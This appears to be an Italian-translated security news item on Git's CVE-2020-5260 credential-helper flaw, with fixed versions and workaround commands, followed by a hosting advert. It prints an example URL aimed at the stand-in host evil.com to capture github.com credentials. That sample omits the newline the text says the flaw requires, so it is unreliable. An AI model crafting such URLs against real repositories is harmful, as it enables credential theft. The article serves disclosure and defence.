Vulnerabilità in Git che porta a perdite di credenziali

Pubblicati versioni corrette del sistema di gestione dei sorgenti distribuito Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 e 2.17.4, in cui è stato risolto vulnerabilità (CVE-2020-5260) nel gestore "credential.helper", che porta all'invio di credenziali al host sbagliato quando il client git accede al repository tramite un URL appositamente formattato che contiene un carattere di nuova riga. Questa vulnerabilità può essere utilizzata per inviare credenziali da un altro host a un server controllato dall'attaccante.

Se specificando un URL come «https://evil.com?host=github.com/», il gestore delle credenziali nel collegamento all'host evil.com trasmetterà i parametri di autenticazione impostati per github.com. Il problema si manifesta durante operazioni come «git clone», compresa la gestione degli URL per i submoduli (ad esempio, eseguendo «git submodule update» verranno automaticamente elaborati gli URL specificati nel file .gitmodules del repository). La vulnerabilità è particolarmente pericolosa in situazioni in cui lo sviluppatore esegue il cloning di un repository senza vedere l'URL, come nel caso dei submoduli, o in sistemi che eseguono azioni automatiche, ad esempio, negli script di compilazione dei pacchetti.

Per bloccare la vulnerabilità nelle nuove versioni è vietato l'invio di un carattere di nuova riga in qualsiasi valore trasmesso tramite il protocollo di gestione delle credenziali. Per i pacchetti, è possibile monitorare il rilascio degli aggiornamenti sulle pagine Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch, FreeBSD.

Come soluzione alternativa per bloccare il problema si raccomanda non utilizzare credential.helper quando si accede a repository pubblici e non utilizzare "git clone" in modalità "--recurse-submodules" con repository non verificati. Per disabilitare completamente il gestore credential.helper, che esegue salvataggio e recupero delle password da cache, protetta da archivio o file di password, è possibile utilizzare i seguenti comandi:

git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper

Fonte: opennet.ru

Acquista hosting affidabile per siti web con protezione DDoS, server VPS VDS 🔥 Acquista hosting affidabile per siti web con protezione DDoS, server VPS VDS - ProHoster